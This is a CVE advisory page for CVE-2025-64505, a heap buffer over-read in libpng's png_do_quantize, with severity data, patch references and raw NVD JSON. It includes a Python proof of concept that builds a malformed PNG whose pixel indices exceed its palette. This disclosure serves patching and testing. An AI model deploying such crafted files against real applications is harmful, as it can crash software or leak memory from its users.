Security Vulnerability Report

CVE-2025-64505

Published: 2025-11-25 00:15:47
Last Modified: 2025-11-26 18:28:32

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE
libpng < 1.6.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64505 PoC - Malformed PNG with out-of-range palette indices

This PoC demonstrates the heap buffer over-read in libpng's png_do_quantize
function. Note: png_do_quantize only runs when the reading application has
enabled the quantize transform via png_set_quantize; a plain decode of this
file does not exercise the affected code path.
"""
import struct
import zlib


def create_malformed_png():
    """
    Create a minimal PNG file with malformed palette indices that triggers
    the vulnerability in png_do_quantize
    """
    # PNG signature
    png_sig = b'\x89PNG\r\n\x1a\n'

    # IHDR chunk - 8x8 pixel, 8-bit indexed color
    # width, height, bit depth, color type 3 (palette), compression, filter, interlace
    ihdr_data = struct.pack('>IIBBBBB', 8, 8, 8, 3, 0, 0, 0)
    ihdr_crc = zlib.crc32(b'IHDR' + ihdr_data) & 0xffffffff
    ihdr_chunk = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', ihdr_crc)

    # PLTE chunk - Palette with only 2 entries (indices 0 and 1)
    # But we'll use indices beyond this range in the image data
    palette = b'\xff\x00\x00' + b'\x00\xff\x00'  # Red and Green
    plte_crc = zlib.crc32(b'PLTE' + palette) & 0xffffffff
    plte_chunk = struct.pack('>I', 6) + b'PLTE' + palette + struct.pack('>I', plte_crc)

    # IDAT chunk - Image data with out-of-range palette indices
    # Valid indices for this palette are 0-1; the pixels below carry 0-63,
    # so all but the first two are out of range.
    # Each 8-pixel scanline is prefixed with a filter-type byte (0 = None),
    # as the PNG format requires: 8 rows * (1 + 8) = 72 bytes of raw data.
    raw_data = b''.join(
        b'\x00' + bytes((row * 8 + col) % 256 for col in range(8))
        for row in range(8)
    )
    compressed = zlib.compress(raw_data)
    idat_crc = zlib.crc32(b'IDAT' + compressed) & 0xffffffff
    idat_chunk = struct.pack('>I', len(compressed)) + b'IDAT' + compressed + struct.pack('>I', idat_crc)

    # IEND chunk (zero-length)
    iend_crc = zlib.crc32(b'IEND') & 0xffffffff
    iend_chunk = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', iend_crc)

    return png_sig + ihdr_chunk + plte_chunk + idat_chunk + iend_chunk


if __name__ == '__main__':
    png_data = create_malformed_png()
    with open('CVE-2025-64505_poc.png', 'wb') as f:
        f.write(png_data)
    print('PoC PNG file created: CVE-2025-64505_poc.png')
    print('This file contains out-of-range palette indices that may trigger')
    print('heap buffer over-read in vulnerable versions of libpng < 1.6.51')

References

https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37 (Patch)
https://github.com/pnggroup/libpng/pull/748 (Issue Tracking)
https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42 (Vendor Advisory)

Weakness: CWE-125 (Out-of-bounds Read)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64505", "sourceIdentifier": "[email protected]", "published": "2025-11-25T00:15:47.133", "lastModified": "2025-11-26T18:28:32.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.51", "matchCriteriaId": "A8B5D980-7DA8-4291-8723-4CDDF73B19F6"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/pull/748", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": 
"https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}